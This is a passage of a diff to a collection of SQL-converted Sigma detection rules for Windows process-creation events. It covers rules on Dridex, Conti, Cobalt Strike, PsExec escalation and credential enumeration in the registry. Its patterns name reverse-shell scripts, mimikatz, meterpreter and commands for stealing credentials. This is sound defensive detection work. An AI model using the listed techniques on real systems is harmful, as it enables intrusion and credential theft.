"proc_creation_win_reg_import_from_suspicious_paths.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_dridex.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "Potential Password Spraying Attempt Using Dsacls.EXE", - "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", + "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", "status": "experimental", - "description": "Detects possible password spraying attempts using Dsacls", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. 
These files are simply XML and contain paths to various Windows 10 settings binaries.", + "author": "Sreeman", "tags": [ + "attack.t1204", + "attack.t1566.001", "attack.execution", - "attack.t1218" + "attack.initial_access" ], "falsepositives": [ - "Legitimate use of dsacls to bind to an LDAP session" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_password_spray.yml" + "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" }, { - "title": "Explorer Process Tree Break", - "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "title": "HH.EXE Execution", + "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "status": "test", - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", + "description": "Detects the usage of \"hh.exe\" to execute \".chm\" files.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.001" ], "falsepositives": [ - "Unknown" + "False positives are expected with legitimate \".CHM\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%.chm%' ESCAPE '\\')" ], - "filename": "proc_creation_win_explorer_break_process_tree.yml" + "filename": "proc_creation_win_hh_chm_execution.yml" }, { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND 
(CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, 
{ - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", - "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Enumeration for Credentials in Registry", + "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "status": "test", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE 
'\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE 
'\\')" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "Suspicious Electron Application Child Processes", - "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", - "status": "experimental", - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Visual Studio NodejsTools PressAnyKey Renamed Execution", + "id": "65c3ca2c-525f-4ced-968e-246a713d164f", + "status": "test", + "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\discord.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'Microsoft.NodejsTools.PressAnyKey.exe' AND NOT ((NewProcessName LIKE 
'%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_electron_app_children.yml" + "filename": "proc_creation_win_renamed_pressanykey.yml" }, { - "title": "New Root Certificate Installed Via Certutil.EXE", - "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", - "status": "test", - "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "status": "experimental", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i 
powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_certificate_installation.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", + "title": "Password Provided In Command Line Of Net.EXE", + "id": "d4498716-1d52-438f-8084-4a603157d131", "status": "test", - "description": "Atbroker executing non-deafualt 
Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "description": "Detects a when net.exe is called with a password in the command line", + "author": "Tim Shelton (HAWK.IO)", + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_net_use_password_plaintext.yml" + }, + { + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' 
ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", - "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "title": "Use Icacls to Hide File to Everyone", + "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", "status": "experimental", - "description": "Detects the use of Rundll32 to launch an NSIS 
module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", - "author": "TropChaud", + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'RUNDLL32.EXE' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'iCACLS.EXE' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" + "filename": "proc_creation_win_icacls_deny.yml" }, { - "title": "DriverQuery.EXE Execution", - "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility. 
Which can be used to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Mouse Lock Execution", + "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "status": "test", + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "author": "Cian Heasley", "tags": [ - "attack.discovery" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Legitimate use by third party tools in order to investigate installed drivers" + "Legitimate uses of Mouse Lock software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine 